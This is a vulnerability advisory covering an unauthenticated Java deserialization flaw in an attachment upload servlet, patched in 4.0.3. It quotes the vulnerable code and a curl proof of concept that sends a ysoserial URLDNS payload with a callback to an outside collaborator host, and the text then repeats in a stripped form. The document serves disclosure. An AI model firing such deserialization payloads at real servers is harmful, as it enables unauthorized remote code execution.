Impacts
AttachmentUploadServlet deserializes untrusted data from the Attachment-Support header:
protected void doPost(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException {
String fileName = URLDecoder.decode(request.getHeader("File-Name"), StandardCharsets.UTF_8.name());
AttachmentSupport attachmentSuppport = (AttachmentSupport) SerializationUtils
.deserialize(Base64.decodeBase64(request.getHeader("Attachment-Support")));
...
}This Servlet does not enforce any authentication or authorization checks.
PoC
Use ysoserial to generate a probe payload using the URLDNS gadget. This gadget will send a DNS request which we can intercept to prove the deserialization attack was successful.
curl -X POST http://localhost:6610/attachment_upload -H "File-Name: foo" -H "Attachment-Support: `java -jar /Users/pwntester/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://536mvpzmverok48wr06msp5du40uoj.burpcollaborator.net | base64`"
This issue may lead to pre-auth RCE
Patches
This issue was fixed in 4.0.3 by removing AttachmentUploadServlet and not using deserialization
Credits
This issue was discovered by @pwntester
Impacts
AttachmentUploadServletdeserializes untrusted data from theAttachment-Supportheader:This Servlet does not enforce any authentication or authorization checks.
PoC
Use
ysoserialto generate a probe payload using theURLDNSgadget. This gadget will send a DNS request which we can intercept to prove the deserialization attack was successful.This issue may lead to
pre-auth RCEPatches
This issue was fixed in 4.0.3 by removing AttachmentUploadServlet and not using deserialization
Credits
This issue was discovered by @pwntester